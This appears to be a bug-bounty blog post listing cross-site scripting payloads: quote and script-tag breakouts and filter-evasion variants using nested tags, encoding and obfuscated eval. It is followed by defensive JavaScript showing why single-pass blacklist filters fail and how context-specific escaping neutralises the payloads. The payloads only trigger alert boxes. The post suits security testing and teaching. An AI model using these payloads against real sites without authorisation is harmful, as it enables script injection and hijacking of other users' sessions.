vala broumand

Useful XSS Payloads

In this post I will show top and useful XSS payloads in 2022. I found XSS vulnerabilities in many web apps with some of them below.

You can use the payloads below when you are dealing with an injection that goes inside the value of an input:

```
\"-alert(1)//
\'-alert(1)//
%26apos;-alert(1)-%26apos
'-alert(1)-'
```

Use these payloads when you are injecting inside a script tag:

```
</script><img/src/onerror=alert(1)>
<a href="javascript:var a='&apos;-alert(1)-&apos;'">
```

And here are some common payloads:

```
// Basic payload
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
<script>\u0061lert('22')</script>
<script>eval('\x61lert(\'33\')')</script>
<script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm"
<object/data="jav&#x61;sc&#x72;ipt&#x3a;al&#x65;rt&#x28;23&#x29;">

// Img payload
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
```
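Seen from the defending side, the nested payloads above (`<scr<script>ipt>`, `oneonerrorrror`) only get through filters that delete a blacklisted token once, and the quote and `</script>` breakouts only work where output is not encoded for the context it lands in. The following is an added example, not code from the original post: `naiveStrip`, `escapeHtml` and `jsStringLiteral` are hypothetical helper names, and `naiveStrip` is a constructed stand-in for a single-pass blacklist filter.

```javascript
// Payloads copied from the lists above; used here only as filter test input.
const NESTED_SCRIPT = "<scr<script>ipt>alert('XSS')</scr<script>ipt>";
const NESTED_HANDLER = "<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>";
const SCRIPT_BREAKOUT = "</script><img/src/onerror=alert(1)>";
const QUOTE_BREAKOUT = "'-alert(1)-'";

// Hypothetical single-pass blacklist: each match is deleted once and the
// result is never re-scanned, so the leftover pieces rejoin into the token.
function naiveStrip(input) {
  return input.replace(/<\/?script>/gi, "").replace(/onerror/gi, "");
}

// HTML body / quoted-attribute context: encode every character that can
// change how the browser parses the surrounding markup.
function escapeHtml(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(input).replace(/[&<>"']/g, (c) => map[c]);
}

// Inline <script> context: emit a JS string literal. JSON.stringify handles
// quotes and backslashes; <, >, &, ' and the line separators are then written
// as \uXXXX so the value cannot close the script block or be entity-decoded.
function jsStringLiteral(input) {
  return JSON.stringify(String(input)).replace(/[<>&'\u2028\u2029]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// Print what each approach produces for the sample inputs.
for (const p of [NESTED_SCRIPT, NESTED_HANDLER, SCRIPT_BREAKOUT, QUOTE_BREAKOUT]) {
  console.log("input           :", p);
  console.log("naiveStrip      :", naiveStrip(p));       // still executable markup
  console.log("escapeHtml      :", escapeHtml(p));       // inert text in HTML
  console.log("jsStringLiteral :", jsStringLiteral(p));  // inert data in a script
  console.log();
}
```

Each encoder is only valid for its own context: `escapeHtml` output is not safe inside a script block, and `jsStringLiteral` output is not safe as raw HTML.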

Find Security and Bug Bounty Books in my telegram channel ==>

